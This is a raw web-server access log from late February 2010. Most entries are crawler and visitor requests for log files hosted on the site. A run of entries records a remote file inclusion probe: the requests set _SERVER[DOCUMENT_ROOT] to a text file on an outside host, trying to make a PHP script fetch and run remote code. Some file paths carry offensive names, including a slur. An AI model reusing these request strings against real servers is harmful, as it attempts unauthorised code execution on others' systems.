93.158.148.31 - - [25/Feb/2010:22:06:11 -0800] "GET /browserbomb-access.log HTTP/1.1" 200 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
112.93.191.152 - - [25/Feb/2010:22:07:18 -0800] "GET /vaginacide-access.log HTTP/1.1" 200 13773 "http://www.google.cn/search?hl=zh-CN&newwindow=1&client=aff-360errorpage&hs=Ost&q=67.228.14.&start=20&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; 360SE)"
112.93.191.152 - - [25/Feb/2010:22:07:18 -0800] "GET /favicon.ico HTTP/1.1" 302 359 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; 360SE; 360SE)"
112.93.191.152 - - [25/Feb/2010:22:07:23 -0800] "GET /vaginacide-access.log HTTP/1.1" 200 13773 "http://www.google.cn/search?hl=zh-CN&newwindow=1&client=aff-360errorpage&hs=Ost&q=67.228.14.&start=20&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"
93.158.148.31 - - [25/Feb/2010:22:09:23 -0800] "GET /clownjuice-error.log HTTP/1.1" 200 47887 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.48 - - [25/Feb/2010:22:13:27 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.48 - - [25/Feb/2010:22:30:05 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.48 - - [25/Feb/2010:22:51:08 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.158.148.31 - - [25/Feb/2010:22:54:28 -0800] "GET /ferality-error.log HTTP/1.1" 200 44407 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.48 - - [25/Feb/2010:23:16:01 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.158.148.31 - - [25/Feb/2010:23:39:32 -0800] "GET /jasoncmartin-access.log HTTP/1.1" 200 494234 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.48 - - [25/Feb/2010:23:44:35 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.48 - - [26/Feb/2010:00:18:40 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.158.148.31 - - [26/Feb/2010:00:24:41 -0800] "GET /evilfuckers-access.log HTTP/1.1" 200 124936 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.48 - - [26/Feb/2010:00:56:20 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.158.148.31 - - [26/Feb/2010:01:09:45 -0800] "GET /browserbomb-error.log HTTP/1.1" 200 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.68.183 - - [26/Feb/2010:01:22:58 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [26/Feb/2010:01:22:58 -0800] "GET /clownjuice-access.log HTTP/1.1" 200 102272 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.19.170.56 - - [26/Feb/2010:01:34:11 -0800] "GET / HTTP/1.1" 200 5976 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)"
85.180.162.10 - - [26/Feb/2010:01:34:28 -0800] "GET /vaginacide-access.log HTTP/1.1" 200 13773 "http://www.google.de/search?hl=de&client=firefox-a&hs=WoH&rls=com.ubuntu%3Aen-US%3Aunofficial&q=%22GET+robots.txt+HTTP%22+filetype%3Alog&btnG=Suche&meta=&aq=f&oq=" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.17) Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/3.0.17"
85.180.162.10 - - [26/Feb/2010:01:34:29 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.17) Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/3.0.17"
85.180.162.10 - - [26/Feb/2010:01:34:32 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.17) Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/3.0.17"
207.46.199.48 - - [26/Feb/2010:01:38:06 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.158.148.31 - - [26/Feb/2010:01:54:47 -0800] "GET /gorgeworld-access.log HTTP/1.1" 200 93892 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.48 - - [26/Feb/2010:02:22:42 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.48 - - [26/Feb/2010:02:23:42 -0800] "GET /terhanian-access.log HTTP/1.1" 200 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.158.148.31 - - [26/Feb/2010:02:39:50 -0800] "GET /terhanian-access.log HTTP/1.1" 200 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
93.158.148.31 - - [26/Feb/2010:03:24:52 -0800] "GET /terhanian-error.log HTTP/1.1" 200 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
93.158.148.31 - - [26/Feb/2010:04:09:53 -0800] "GET /?C=D;O=A HTTP/1.1" 200 5981 "-" "Yandex/1.01.001 (compatible; Win16; I)"
93.158.148.31 - - [26/Feb/2010:04:54:55 -0800] "GET /gorgeworld-error.log HTTP/1.1" 200 27045 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.162 - - [26/Feb/2010:05:38:11 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
93.158.148.31 - - [26/Feb/2010:05:39:57 -0800] "GET /dustinharley-error.log HTTP/1.1" 200 44814 "-" "Yandex/1.01.001 (compatible; Win16; I)"
93.158.148.31 - - [26/Feb/2010:06:24:59 -0800] "GET /vaginacide-access.log HTTP/1.1" 200 13773 "-" "Yandex/1.01.001 (compatible; Win16; I)"
93.158.148.31 - - [26/Feb/2010:07:10:00 -0800] "GET /sharkbomb-error.log HTTP/1.1" 200 13961 "-" "Yandex/1.01.001 (compatible; Win16; I)"
211.232.45.121 - - [26/Feb/2010:08:27:08 -0800] "GET //logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:27:08 -0800] "GET /clownjuice-access.log//logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:28:32 -0800] "GET //logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:28:32 -0800] "GET /clownjuice-access.log//logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:28:46 -0800] "GET /gorgeworld-access.log//logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:32:46 -0800] "GET /gorgeworld-access.log//logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:41:42 -0800] "GET //logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:41:43 -0800] "GET /clownjuice-access.log//logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:41:43 -0800] "GET /clownjuice-access.log//logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:42:46 -0800] "GET //logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:46:18 -0800] "GET /gorgeworld-access.log//logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:46:20 -0800] "GET //logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:46:23 -0800] "GET /clownjuice-access.log//logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:49:24 -0800] "GET /gorgeworld-access.log//logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
211.232.45.121 - - [26/Feb/2010:08:50:37 -0800] "GET /gorgeworld-access.log//logs//?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/data/id2.txt? HTTP/1.1" 302 360 "-" "Mozilla/5.0"
207.46.204.193 - - [26/Feb/2010:08:59:13 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:09:04:57 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:09:13:49 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:09:26:30 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:09:44:08 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:10:12:31 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.68.203 - - [26/Feb/2010:10:31:37 -0800] "GET /robots.txt HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.203 - - [26/Feb/2010:10:31:37 -0800] "GET /log.20080919/jeremykm-error.log HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.204.193 - - [26/Feb/2010:10:38:32 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:11:06:46 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.222.4.218 - - [26/Feb/2010:11:15:24 -0800] "GET /robots.txt HTTP/1.0" 302 360 "http://unusualdischarge.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
74.222.4.218 - - [26/Feb/2010:11:15:24 -0800] "GET / HTTP/1.0" 200 5981 "http://unusualdischarge.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
216.129.119.12 - - [26/Feb/2010:11:39:02 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.204.193 - - [26/Feb/2010:11:39:12 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:12:15:53 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:12:56:19 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:13:40:31 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:13:41:13 -0800] "GET /browserbomb-error.log HTTP/1.1" 200 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.12.49.5 - - [26/Feb/2010:15:21:06 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
66.249.68.183 - - [26/Feb/2010:15:21:55 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [26/Feb/2010:15:21:55 -0800] "GET /gorgeworld-access.log HTTP/1.1" 200 94726 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.159.206.159 - - [26/Feb/2010:15:47:31 -0800] "GET /browserbomb-access.log HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.81.213.79 - - [26/Feb/2010:16:08:59 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/spider.html;) Gecko/2008032620"
123.125.66.30 - - [26/Feb/2010:17:31:29 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.68.203 - - [26/Feb/2010:19:38:00 -0800] "GET /robots.txt HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.203 - - [26/Feb/2010:19:38:00 -0800] "GET /log.20080919/jeremykm-error.log HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.204.193 - - [26/Feb/2010:20:44:22 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:20:48:39 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:21:01:37 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:21:13:49 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:21:29:53 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.208.86.237 - - [26/Feb/2010:21:44:02 -0800] "GET /gorgeworld-error.log HTTP/1.1" 200 27591 "http://unusualdischarge.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
118.208.86.237 - - [26/Feb/2010:21:44:06 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "http://unusualdischarge.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
118.208.86.237 - - [26/Feb/2010:21:44:09 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "http://unusualdischarge.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
118.208.86.237 - - [26/Feb/2010:21:44:22 -0800] "GET / HTTP/1.1" 200 5981 "http://unusualdischarge.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
118.208.86.237 - - [26/Feb/2010:21:44:23 -0800] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://unusualdischarge.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
118.208.86.237 - - [26/Feb/2010:21:44:23 -0800] "GET /icons/text.gif HTTP/1.1" 200 229 "http://unusualdischarge.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
207.46.204.193 - - [26/Feb/2010:21:51:25 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:22:16:30 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:22:45:43 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.45.105.138 - - [26/Feb/2010:22:46:32 -0800] "GET /ferality-access.log HTTP/1.1" 200 589743 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
93.158.148.31 - - [26/Feb/2010:23:10:44 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.193 - - [26/Feb/2010:23:19:05 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [26/Feb/2010:23:55:13 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.158.148.31 - - [27/Feb/2010:00:10:01 -0800] "GET /?C=S;O=A HTTP/1.1" 200 5981 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.193 - - [27/Feb/2010:00:37:05 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [27/Feb/2010:01:22:09 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.193 - - [27/Feb/2010:01:22:49 -0800] "GET /browserbomb-error.log HTTP/1.1" 200 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.68.183 - - [27/Feb/2010:01:34:46 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [27/Feb/2010:01:34:46 -0800] "GET /vaginacide-access.log HTTP/1.1" 200 13773 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.158.148.31 - - [27/Feb/2010:02:08:36 -0800] "GET /?C=M;O=A HTTP/1.1" 200 5981 "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.68.183 - - [27/Feb/2010:03:08:46 -0800] "GET /clownjuice-access.log HTTP/1.1" 200 105318 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [27/Feb/2010:03:50:21 -0800] "GET /paxnihilo-access.log HTTP/1.1" 200 11821 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.218.116.162 - - [27/Feb/2010:04:39:48 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
208.80.193.33 - - [27/Feb/2010:05:48:22 -0800] "GET / HTTP/1.0" 200 5981 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1)"
67.218.116.162 - - [27/Feb/2010:08:10:16 -0800] "GET /orbsucks-error.log HTTP/1.1" 200 57511 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.68.183 - - [27/Feb/2010:08:33:49 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [27/Feb/2010:08:33:49 -0800] "GET /gorgeworld-error.log HTTP/1.1" 200 28056 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.117.9.148 - - [27/Feb/2010:10:48:39 -0800] "GET /sitemap.xml HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6"
207.241.227.93 - - [27/Feb/2010:10:48:41 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "ia_archiver-web.archive.org"
88.117.9.148 - - [27/Feb/2010:10:48:50 -0800] "GET /sitemap.xml HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTB6"
216.129.119.12 - - [27/Feb/2010:11:48:03 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.68.183 - - [27/Feb/2010:12:10:48 -0800] "GET /ferality-error.log HTTP/1.1" 200 45529 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.70.60.19 - - [27/Feb/2010:12:15:34 -0800] "GET / HTTP/1.1" 200 5976 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)"
99.191.140.133 - - [27/Feb/2010:13:06:52 -0800] "GET /labels.rdf HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
99.191.140.133 - - [27/Feb/2010:13:06:52 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
69.39.89.40 - - [27/Feb/2010:13:07:00 -0800] "GET / HTTP/1.1" 200 5985 "-" "PHP/5.2.8"
66.249.68.203 - - [27/Feb/2010:13:17:33 -0800] "GET /robots.txt HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.203 - - [27/Feb/2010:13:17:33 -0800] "GET / HTTP/1.1" 200 5980 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
127.0.0.1 - - [27/Feb/2010:13:34:23 -0800] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.2.11 (FreeBSD) mod_ssl/2.2.11 OpenSSL/0.9.8e DAV/2 PHP/5.2.9 with Suhosin-Patch (internal dummy connection)"
93.158.148.31 - - [27/Feb/2010:13:36:49 -0800] "GET / HTTP/1.1" 200 5981 "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.68.183 - - [27/Feb/2010:15:39:01 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.159.206.159 - - [27/Feb/2010:15:48:22 -0800] "GET /browserbomb-access.log HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.94.249.38 - - [27/Feb/2010:16:06:53 -0800] "GET / HTTP/1.1" 200 5985 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
93.158.148.31 - - [27/Feb/2010:17:06:28 -0800] "GET /orbsucks-error.log HTTP/1.1" 200 58271 "-" "Yandex/1.01.001 (compatible; Win16; I)"
123.125.66.46 - - [27/Feb/2010:17:34:52 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.67.166 - - [27/Feb/2010:18:00:41 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.166 - - [27/Feb/2010:18:00:41 -0800] "GET / HTTP/1.1" 200 5981 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.122.65.235 - - [27/Feb/2010:18:07:34 -0800] "GET /vaginacide-access.log HTTP/1.1" 200 13773 "http://www.google.com.tr/search?hl=tr&source=hp&q=66.249.71.150&btnG=Google%27da+Ara&meta=&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
94.122.65.235 - - [27/Feb/2010:18:07:36 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.6 (KHTML, like Gecko) Chrome/4.0.266.0 Safari/532.6"
66.249.68.183 - - [27/Feb/2010:19:57:22 -0800] "GET /gorgeworld-access.log HTTP/1.1" 200 95877 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.203 - - [27/Feb/2010:20:23:08 -0800] "GET /robots.txt HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.203 - - [27/Feb/2010:20:23:08 -0800] "GET /log.20080919/analjew-error.log HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.158.148.31 - - [27/Feb/2010:20:36:08 -0800] "GET /?C=N;O=A HTTP/1.1" 200 5981 "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.67.166 - - [27/Feb/2010:22:44:39 -0800] "GET /log.20080919/flappygash-error.log HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.45.105.138 - - [28/Feb/2010:00:43:30 -0800] "GET /ferality-access.log HTTP/1.1" 200 600738 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
66.249.68.183 - - [28/Feb/2010:01:06:32 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [28/Feb/2010:01:06:33 -0800] "GET /ferality-error.log HTTP/1.1" 200 45962 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.106.41.243 - - [28/Feb/2010:01:19:16 -0800] "GET /jasoncmartin-access.log HTTP/1.1" 200 511406 "http://unusualdischarge.com/jasoncmartin-access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
93.158.148.31 - - [28/Feb/2010:02:25:32 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Yandex/1.01.001 (compatible; Win16; I)"
75.101.197.161 - - [28/Feb/2010:03:02:00 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )"
75.101.197.161 - - [28/Feb/2010:03:02:00 -0800] "GET / HTTP/1.1" 200 5981 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )"
75.101.197.161 - - [28/Feb/2010:03:02:35 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )"
75.101.197.161 - - [28/Feb/2010:03:02:35 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )"
75.101.197.161 - - [28/Feb/2010:03:02:36 -0800] "GET /?C=D;O=A HTTP/1.1" 200 5981 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )"
75.101.197.161 - - [28/Feb/2010:03:02:36 -0800] "GET /?C=N;O=D HTTP/1.1" 200 5981 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )"
